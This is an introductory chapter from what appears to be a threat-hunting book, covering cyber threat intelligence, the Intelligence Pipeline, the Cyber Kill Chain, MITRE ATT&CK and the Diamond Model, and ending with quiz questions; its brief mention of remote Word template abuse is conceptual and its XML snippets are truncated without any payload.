Generally speaking, there are a few "shiny penny" terms in modern IT terminology – blockchain, artificial intelligence, and the dreaded single pane of glass are some classic examples. Cyber Threat Intelligence (CTI) and threat hunting are no different. While all of these terminologies are tremendously valuable, they are commonly used for figurative hand-waving by marketing and sales teams to procure a meeting with a C-suite. With that in mind, let's discuss what CTI and threat hunting are in practicality, versus as umbrella terms for all things security.
Through the rest of this book, we'll refer back to the theories and concepts that we will cover here. This chapter will focus a lot on critical thinking, reasoning processes, and analytical models; understanding these is paramount because threat hunting is not linear. It involves constant adaption with a live adversary on the other side of the keyboard. As hard as you are working to detect them, they are working just as hard to evade detection. As we'll discover as we progress through the book, knowledge is important, but being able to adapt to a rapidly changing scenario is crucial to success.
In this chapter, we'll go through the following topics:
- What is cyber threat intelligence?
- The Intelligence Pipeline
- The Lockheed Martin Cyber Kill Chain
- Mitre's ATT&CK Matrix
- The Diamond Model
What is cyber threat intelligence?
When we talk about traditional SecOps, we're referring to the deployment and management of various types of infrastructure and defensive tools – think firewalls, intrusion detection systems, vulnerability scanners, and antiviruses. Additionally, this includes some of the less exciting elements, such as policy, and processes such as privacy and incident response (not to say that incident response isn't an absolute blast). There are copious amounts of publications that describe traditional SecOps and I'm certainly not going to try and re-write them. However, to grow and mature as a threat hunter, you need to understand where CTI and threat hunting fit into the big picture.
When we talk about CTI, we mean the processes of collection, analysis, and production to transition data into information, and lastly, into intelligence (we'll discuss technologies and methodologies to do that later) and support operations to detect observations that can evade automated detections. Threat hunting searches for adversary activity that cannot be detected through the use of traditional signature-based defensive tools. These mainly include profiling and detecting patterns using endpoint and network activity. CTI and threat hunting combined are the processes of identifying adversary techniques and their relevance to the network being defended. They then generate profiles and patterns within data to identify when someone may be using these identified techniques and – this is the often overlooked part – lead to data-driven decisions.
A great example would be identifying that abusing authorized binaries, such as PowerShell or GCC, is a technique used by adversaries. In this example, both PowerShell and GCC are expected to be on the system, so their existence or usage wouldn't cause a host-based detection system to generate an alert. So CTI processes would identify that this is a tactic used by adversaries, threat hunting would profile how these binaries are used in a defended network, and finally, this information would be used to inform active response operations or recommendations to improve the enduring defensive posture.
Of particular note is that while threat hunting is an evolution from traditional SecOps, that isn't to say that it is inherently better. They are two sides of the same coin. Understanding traditional SecOps and where intelligence analysis and threat hunting should be folded into it is paramount to being successful as a technician, responder, analyst, or leader. In this chapter, we'll discuss the different parts of traditional security operations and how threat hunting and analysis can support SecOps, as well as how SecOps can support threat hunting and incident response operations:
Figure 1.1 – The relationship between IT and cyber security
In the following chapters, we'll discuss several models, both industry-standard ones as well as my own, along with my thoughts on them, what their individual strengths and weaknesses are, and their applicability. It is important to remember that models and frameworks are just guides to help identify research and defensive prioritizations, incident response processes, and tools to describe campaigns, incidents, and events. Analysts and operators get into trouble when they try to use models as one-size-fits-all solutions that, in reality, are purely linear and inflexibly rigid.
The models and frameworks that we'll discuss are as follows:
- The Intelligence Pipeline
- The Lockheed Martin Kill Chain
- The MITRE ATT&CK Matrix
- The Diamond Model
Finally, we'll discuss how the models and frameworks are most impactful when they are chained together instead of being used independently.
The Intelligence Pipeline
Threat hunting is more than comparing provided indicators of compromise (IOCs) to collected data and finding a "known bad." Threat hunting relies on the application and analysis of data into information and then into intelligence – this is known as the Intelligence Pipeline. To process data through the pipeline, there are several proven analytical models that can be used to understand where an adversary is in their campaign, where they'll need to go next, and how to prioritize threat hunting resources (mainly, time) to disrupt or degrade an intrusion.
The Intelligence Pipeline isn't my invention. I first read about it in an extremely nerdy traditional intelligence-doctrine publication from the United States Joint Chiefs of Staff, JP 2-0 (https://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/jp2_0.pdf). In this document, this process is referred to as the Relationship of Data, Information, and Intelligence process. However, as I've taken it out of that document and made some adjustments to fit my experiences and the cyber domain, I feel that the Intelligence Pipeline is more apt. It is the pipeline and process that you use to inform data-driven decisions:
Figure 1.2 – The Intelligence Pipeline
The idea of the pipeline is to introduce the theory that intelligence is made, and generally not provided. This is an anathema to vendors selling the product of actionable intelligence. I should note that selling data or information isn't wrong (in fact, it's really required in one form or another), but you should know precisely what you're getting – that is, data or information, not intelligence.
As illustrated, the operating environment is everything – your environment, the environment of your trust relationships, the environment of your MSSP, and so on. From here, events go through the following processes:
- Events are collected and processed to turn them into data.
- Context and enrichment are added to turn the data into information.
- Internal analysis and production are applied to the information to create intelligence.
- Data-driven decisions can be created (as necessary).
As an example, you might be informed that "this IP address was observed scanning for exposed unencrypted ports across the internet." This is data, but that's all it is. It isn't really even interesting. It's just the "winds of the internet." Ideally, this data would have context applied, such as "this IP address is scanning for exposed unencrypted ports across the internet for ASNs owned by banks"; additionally, the enrichment added could be that this IP address is associated with the command and control entities of a previously observed malicious campaign.
So now we know that a previously identified malicious IP address is scanning financial services organizations for unencrypted ports. This is potentially interesting as it has some context and enrichment and is perhaps very interesting if you're in the financial services vertical, meaning that this is information and is on its way to becoming intelligence. This is where most vendors lose their ability to provide any additional value. That's not to say that this isn't necessarily valuable, but an answer to "did this IP address scan my public environment and do I have any unencrypted exposed ports?" is a level of analysis and production that an external party cannot provide (generally). This is where you, the analyst or the operator, come in to create intelligence. To do this, you need to have a few things, most notably, your own endpoint and network observations so that you can help inform a data-driven decision about what your threat, risk, and exposure could be – and no less importantly, some recommendations on how to reduce those things. The skills that we'll teach later on in this book will discuss how we can do this.
As an internal organization, rarely do you have the resources at your disposal to collect the large swaths of data needed to (eventually) generate intelligence. Additionally, adding context and enrichment at that scale is monumentally expensive in terms of personnel, technology, and capital. So acquiring those services from industry partnerships, generic or vertical-specific Information Sharing and Analysis Centers (ISACs), government entities, and vendors is paramount to having a solid intelligence and threat hunting program. To restate what I mentioned previously, buying or selling "threat intelligence" isn't bad – it's necessary, you just need to know that what you're receiving isn't a magic bullet and almost certainly isn't "actionable intelligence" until it is analyzed into an intelligence product by internal resources so that decision-makers are properly informed in formulating their response.
The Lockheed Martin Cyber Kill Chain
Lockheed Martin is a United States technology company in the Defense Industrial Base (DIB) that, among other things, created a response model to identify activities that an adversary must complete to successfully complete a campaign. This model was one of the first to hit the mainstream that provided analysts, operators, and responders with a way to map an adversary's campaign. This mapping provided a roadmap that, once any adversary activity was detected, outlined how far into the campaign the adversary had gotten, what actions had not been observed yet, and (during incident recovery) what defensive technology, processes, or training needed to be prioritized.
An important note regarding the Lockheed Martin Cyber Kill Chain: it is a high-level model that is used to illustrate adversary campaign activity. Many tactics and techniques can cover multiple phases, so as we discuss the model below, the examples will be large buckets instead of specific tactical techniques. Some easy examples of this would be supply chain compromises and abusing trust relationships. These are fairly complex techniques that can be used for a lot of different phases in a campaign (or chained between campaigns or phases). Fear not, we'll look at a more specific model (the MITRE ATT&CK framework) in the next chapter.
Figure 1.3 – Lockheed Martin's Cyber Kill Chain
- Command & Control
- Actions on the Objective
Let's look at each of them in detail in the following sections.
The Reconnaissance phase is performed when the adversary is mapping out their target. This phase is performed both actively and passively through network and system enumeration, social media profiling, identifying possible vulnerabilities, identifying the protective posture (to include the security teams) of the targeted network, and identifying what the target has that may be of value (Does your organization have something of value such as intellectual property? Are you a part of the DIB? Are you part of a supply chain that could be used for a further compromise, personally identifiable/health information (PII/PHI)?).
Weaponization is one of the most expensive parts of the Kill Chain for the adversary. This is when they must go into their arsenal of tools, tactics, and techniques and identify exactly how they are going to leverage the information they collected in the previous phase to achieve their objectives. It's a potentially expensive phase that doesn't leave much room for error. Do they use their bleeding-edge zero-day exploits (that is, exploits that have not been previously disclosed), thus making them unusable in other campaigns? Do they try to use malware, or do they use a Living-Off-the-Land Binary (LOLBin)? Do too much and they're wasting their resources needed (personnel, capital, and time) to develop zero-days and complex malware, but too little and they risk getting caught and exposing their attack vehicle.
This phase is also where adversaries acquire infrastructure, both to perform the initial entry, stage and launch payloads, perform command and control, and if needed, locate an exfiltration landing spot. Depending on the complexity of the campaign and skill of the adversary, infrastructure is either stolen (exploiting and taking over a benign website as a launch/staging point) or purchasing infrastructure. Frequently, infrastructure is stolen because it is easier to blend in with normal network traffic for a legitimate website. Additionally, when you steal infrastructure, you don't have to put out any money for things that can be traced back to the actor (domain registrations, TLS certificates, hosting, and so on).
This phase is where the adversary makes their attempt to get into the target network. Frequently, this is attempted through phishing (generic, spear-, or whale-phishing, or even through social media). However, this can also be attempted through an insider, a hardware drop (the oddly successful thumb drive in a parking lot), or a remotely exploitable vulnerability.
Generally, this is the riskiest part of a campaign as it is the first time that the adversary is "reaching out and touching" their target with something that could tip off defenders that an attack is incoming.
This phase is performed when the adversary actually exploits the target and executes code on the system. This can be through the use of an exploit against a system vulnerability, the user, or any combination of the lot. An exploit against a system vulnerability is fairly self-explanatory – this either needs to be carried out by tricking the user into opening an attachment or link that executes an exploit condition (Arbitrary Code Execution (ACE)) or an exploit that needs to be remotely exploitable (Remote Code Execution (RCE)).
The Exploitation phase is generally the first time that you may notice adversary activity as the Delivery phase relies on organizations getting data, such as email, into their environment. While there are scanners and policies to strip out known bad, adversaries are very successful in using email as an initial access point, so the Exploitation phase is frequently where the first detection occurs.
This phase is when an initial payload is delivered as a result of the exploitation of the weaponized object that was delivered to the target. Installation generally has multiple sub-phases, such as loading multiple tools/droppers onto the target that will assist in maintaining a good foothold onto the system, to avoid the adversary losing a valuable piece of malware (or other malicious logic) to a lucky anti-virus detection.
As an example, the exploit may be to get a user to open a document that loads a remote template that includes a macro. When the document is opened, the remote template is loaded and brings the macro with it over TLS. Using this example, the email with the attachment looked like normal correspondence and the adversary didn't have to risk losing a valuable macro-enabled document to an email or anti-virus scanner:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
In the preceding snippet, we can see a normal Microsoft Word document template. Specifically take note of the Target="file:///" section, which defines the local template (GoodTemplate.dotm). In the following snippet, an adversary, using the same Target= syntax, is loading a remote template that includes malicious macros. This process of loading remote templates is allowed within the document standards, which makes it a prime candidate for abuse:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
This can go on for several phases, each iteration being more and more difficult to track, using encryption and obfuscation to hide the actual payload that will finally give the adversary sufficient cover and access to proceed without concern for detection.
As a real-world example, during an incident, I observed an adversary use an encoded PowerShell script to download another encoded PowerShell script from the internet, decode it, and that script then downloaded another encoded PowerShell script, and so on, to eventually download five encoded PowerShell scripts, at which point the adversary believed they weren't being tracked (spoiler: they were).
Command & Control
The Command & Control (C2) phase is used to establish remote access over the implant, and ensure that it is able to evade detection and persist through normal system operation (reboots, vulnerability/anti-virus scans, user interaction with the system, and so on).
Other phases tend to move fairly quickly; however, with advanced adversaries, the Installation and C2 phases tend to slow down to avoid detection, often remaining dormant between phases or sub-phases (sometimes using the multiple dropper downloads technique described previously).
Actions on the Objective
This phase is when the adversary performs the true goal of their intrusion. This can be the end of the campaign or the beginning of a new phase. Traditional objectives can be anything from loading annoying adware, deploying ransomware, or exfiltrating sensitive data. However, it is important to remember that this access itself could be the objective, with the implants sold to bad actors on the dark/deep web who could use them for their own purposes.
As noted, this can launch into a new campaign phase and begin by restarting from the Reconnaissance phase from within the network to collect additional information to dig deeper into the target. This is common with compromises of Industrial Control Systems (ICSes) – these systems aren't (supposed to be) connected to the internet, so frequently you have to get onto a system that does access the internet and then use that as a foothold to access the ICS, thus starting a new Kill Chain process.
Our job as analysts, operators, and responders is to push the adversary as far back into the chain as possible to the point that the expense of attacking outweighs the value of success. Make them pay for every bit they get into our network and it should be the last time they get in. We should identify and share every piece of infrastructure we detect. We should analyze and report every piece of malware or LOLBin tactic we uncover. We should make them burn zero-day after zero-day exploit, only for us to detect and stop their advance. Our job is to make the adversary work tremendously hard to make any advance in our network.
MITRE's ATT&CK Matrices
The MITRE Corporation is a federally funded group used to perform research and development for several government agencies. One of the many contributions they have made to cyber is a series of detailed and tactical matrices that are used to describe adversary activities, known as the Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrices. There are three main matrices, Enterprise, Mobile, and ICS.
The Enterprise Matrix includes tactics and techniques focused on preparatory phases (similar to the Reconnaissance and Weaponization phases from the Lockheed Martin Cyber Kill Chain), traditional operating systems, ICSes, and network-centric adversary tactics.
The matrices are all built upon another MITRE framework known as the Cyber Analytics Repository (CAR), which is focused purely on adversary analytics. The ATT&CK matrices are an abstraction that allows you to view the analytics, by technique, by the tactic.
All of the matrices use a grouping schema of tactic, technique, and in the case of the Enterprise Matrix, sub-technique. When thinking about the differences between a tactic, a technique, and an analytic, all three of these elements describe aggressor behavior in a different, but associated, context:
- A tactic is the highest level of the actor's behavior (what they want to achieve – initial access, execution, and so on).
- A technique is more detailed and carries the context of the tactic (what they are going to use to achieve their tactic – spear phishing, malware, and so on).
- An analytic is a highly detailed description of the behavior and carries with it the context of the technique (for instance, the attacker will send an email with malicious content to achieve the initial access).
- Reconnaissance (PRE matrix only) – Techniques for information collection on the target
- Resource Development (PRE matrix only) – Techniques for infrastructure acquisition and capabilities development
- Initial Access – Techniques to gain an initial foothold into a target environment
- Execution – Techniques to execute code within the target environment
- Persistence – Techniques that maintain access to the target environment
- Privilege Escalation – Techniques that escalate access within the target environment
- Defense Evasion – Techniques to avoid being detected
- Credential Access – Techniques to acquire internal/additional account credentials
- Discovery – Techniques to learn more about the target environment (networks, services, and so on)
- Lateral Movement – Techniques to expand access beyond the initial entry point
- Collection – Techniques to collect information or data for follow-on activities
- Command and Control – Techniques to control implants within the target environment
- Exfiltration – Techniques to steal collected data from the target environment
- Impact – Techniques to negatively deny, degrade, disrupt, or destroy assets, processes, or operations with the target environment
Within these high-level tactics, there are multiple techniques and sub-techniques used to describe the adversary's actions. Two example techniques and sub-techniques (of the nine techniques available) in the Initial Access tactic are as follows:
Table 1.1 – An example of the MITRE ATT&CK tactic, technique, and sub-technique relationship
Figure 1.4 – An example of the MITRE ATT&CK framework in the Elastic Security app
As we can see, MITRE's ATT&CK matrices are much more detailed than the Lockheed Martin Cyber Kill Chain, but that isn't to say that one is necessarily better than the other; both have their uses. As an example, when producing technical writing or briefings, being able to describe that the adversary's Resource Development tactic included the technique of them developing capabilities, and exploits specifically, is valuable; however, if the audience isn't too technical, simply being able to state that the adversary weaponized their attack (using the Lockheed Martin Kill Chain) could be easier to understand.
The Diamond Model
The Diamond Model (The Diamond Model of Intrusion Analysis, Caltagirone, Sergio ; Pendergast, Andrew ; Betz, Christopher, https://apps.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf) was created by a non-profit organization called the Center for Cyber Intelligence Analysis and Threat Research (CCIATR). The paper, titled The Diamond Model of Intrusion Analysis, was released in 2013 with the novel goal to provide a standardized approach to characterize campaigns, differentiate one campaign from another, track their life cycles, and finally, develop countermeasures to mitigate them.
The Diamond Model uses a simple visual to illustrate six elements valuable for campaign tracking: Adversary, Infrastructure, Victim, Capabilities, Socio-political, and Tactics, Techniques, and Procedures (TTP).
This element describes the entity that is the threat actor involved in the campaign, either directly or even indirectly. This can include individual names, organizations, monikers, handles, social media profiles, code names, addresses (physical, email, and so on), telephone numbers, employers, network-connected assets, and so on. Essentially, features that you can use to describe the bad guy.
Network-connected assets can fall into either an adversary or infrastructure node depending on the context. A computer named cruisin-box may be used by the adversary for leisure activities on the internet and be used to describe the person, while hax0r-box may be used by the adversary for network attack and exploitation campaigns and be used to describe the attack infrastructure.
This element describes the entity that describes the adversary-controlled infrastructure leveraged in the campaign. This can include things such as IP addresses, hostnames, domain names, email addresses, network-connected assets, and so on. As we track the life cycle of the campaign and when changing the Diamond Model to the Lockheed Martin Kill Chain, and even MITRE's ATT&CK matrices, the infrastructure can start as an external entity but quickly become an internal entity.
This element describes the entity that is the victim targeted in the campaign. This can describe the same things as the Adversary element but within the context of the victim versus the adversary, so again, this refers to individual names, organizations, and so on. Beyond the scope of context, the victim's network-connected assets are included here if they are relevant to the campaign, while adversary network-controlled assets may be included as part of the Adversary or Infrastructure nodes depending on the context, as described previously.
This element describes the capabilities leveraged in the campaign. There is certainly value in cataloging capabilities that may be known by the analyst as being available to the adversary, but generally, as it relates to the Capabilities node, it's describing the observed capabilities.
I would be remiss to skip over the motivational vertices. These are hugely valuable in describing high-level campaign objectives and are used to help describe how the capabilities and infrastructure relate to, and are leveraged by, one another.
In espionage, actor motivations are distilled into the four categories of MICE, and I think that they make sense in cyber security too:
Money is used as a motivating factor through the collection of capital for work performed. This capital can be a few different things including cash, gifts, status, political position, and so on. A large majority of attackers are likely to fall under the money category; they launch attacks to get money for extortion, selling access or data, or other such campaign objectives that result in making money as a result of their intrusion.
Ideology is a motivating factor in that an actor believes in a specific cause or has fierce patriotism, believing that they should carry out offensive actions either to further their cause or national strategic interests.
Coercion is a motivating factor in that an actor has some sort of situation that can be used as leverage to force them to carry out offensive actions. Examples of leverage can be a secret, sick family members, or having performed previous actions.
Figure 1.5 – The Diamond Model
Ego is a motivating factor in that an actor believes that they are more skilled than their peers (if they believe they have any); they believe that they have been marginalized, or simply seek to catalog their exploits for "internet points."
While we look at MICE to represent threat actor motivations, it is important to remember that defenders usually do their work on the other side of the keyboard for much the same reasons of money, ideology, and/or ego, and much less commonly, coercion.
In campaign tracking, there is certainly value in describing the different nodes of the Diamond Model, but there are also the edges that show how the nodes are associated with each other. If you look through the preceding discussion, you'll see that there is a single letter next to each node ((a)dversary, (i)nfrastructure, (v)ictim, and (c)apabilities). We can use this to describe the direction of the node relationships of the campaign, which can improve response activities, mitigations, and resource prioritization by knowing how the adversary is moving throughout the campaign. Different directionalities include Victim-to-Infrastructure (v2i), Infrastructure-to-Victim (i2v), Infrastructure-to-Infrastructure (i2i), Adversary-to-Infrastructure (a2i), and Infrastructure-to-Adversary (i2a).
Strategic, operational, and tactical intelligence
We've discussed several analytical models that can help frame strategic, operational, and tactical operations – be that intelligence, hunting, or traditional SecOps. While there are individual books that have been written about each of these frameworks and models, and while we have just introduced them, it is also important to understand how they are all related and that each model can be overlaid on another.
Before we talk about stitching models together, there is another concept to describe, and that is Strategic, Operational, and Tactical. There have been a few different approaches to describing these phases, and to be honest, I think that they all probably work as long as you're taking a uniform approach and applying the thought processes the same way across all of your analytical processes and models. I choose to describe these high-level elements as follows:
- Strategic – Who is launching this campaign and why are they doing it?
- Operational – What is happening throughout this campaign?
- Tactical – How did the adversary carry out the campaign?
Each of these three elements has a great deal of analysis that can go into research to understand them for each campaign.
There are a few different ways to analyze information across models. As an example, here is a way you could combine the Intelligence Pipeline with elements of the Diamond Model, and strategic/operational/tactical observations:
Table 1.2 – The Intelligence Pipeline and the Diamond Model
You can use this kind of table to help structure and prioritize your research and response efforts. This becomes even more helpful when you're thinking about your collection strategy, hopefully before an event starts. As you fill this table out, you'll learn more about your adversary, the campaign, your capabilities, and where the opportunities are to frustrate a current or future adversary.
Another method for chaining models together is to combine the Lockheed Martin Cyber Kill Chain and the Diamond Model. This allows you to associate adversary actions mapped with the Diamond Model with other parallel campaigns, note shared elements between events and campaigns, produce confidence assessments based on your inferences, and also determine how far the adversaries may be in their campaigns:
Figure 1.6 – The Diamond Model and the Lockheed Martin Kill Chain (Source: The Diamond Model of Intrusion Analysis, Caltagirone, Sergio ; Pendergast, Andrew ; Betz, Christopher, https://apps.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf)
I do understand that this book isn't specifically just about intelligence analysis, but as I mentioned at the beginning of the chapter, only when you tightly couple intelligence analysis, processes, methodologies, and traditional SecOps can you begin threat hunting. So the introduction to these models was really meant to help put you in the right mindset to approach threat hunting analytically, strategically, operationally, and tactically, and also to highlight that this is a team sport.
Understanding how to track, identify, and evict an adversary from a contested network involves many different skills. While the technical skills can obviously not be overlooked, being able to understand the adversary, their motivations, their goals and objectives, and how they use the tools at their disposal is paramount to a mature intelligence, threat hunting, and security program. In this chapter, we learned about various models that can be used to gain an understanding of how a campaign may unfold and how the application and execution of those models can lead to proactive responses instead of always chasing artifacts. These lessons will continue to be reinforced as we progress through the book and will lead to a far deeper understanding of investigating security events.
In the next chapter, we will have an introduction to threat hunting, discuss how to profile data to identify deviations and the importance of doing so, describe the data patterns of life, and examine the overall threat hunting methodologies that will be put to use as we progress through the book.
As we conclude, here is a list of questions for you to test your knowledge regarding this chapter's material. You will find the answers in the Assessments section of the Appendix:
- What is cyber threat intelligence?
a. Processes and methodologies that replace traditional SecOps
b. The new name for SecOps, but essentially the same
c. Processes and methodologies tightly coupled with, and in support of, traditional SecOps
d. Processes to acquire third-party threat feeds
- Which stage of the Intelligence Pipeline adds context and enrichment?
b. Data-driven decisions
- In which phase of the Lockheed Martin Kill Chain do adversaries first attempt to exploit their target?
c. Command & Control
d. Actions on the Objective
- Which MITRE ATT&CK tactic includes techniques to expand access beyond the initial entry point?
a. Lateral Movement
c. Credential Access
d. Defense Evasion
- In the Diamond Model, which element describes adversary-controlled assets?
To learn more about applied intelligence as it relates to cyberspace, check out these resources:
- The Diamond Model of Intrusion Analysis, Sergio Caltagirone, Andrew Pendergast, and Christopher Betz, http://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf
- The Pyramid of Pain, David Bianco, http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
- Psychology of Intelligence Analysis, Richards Heuer, Pherson Associates, LLC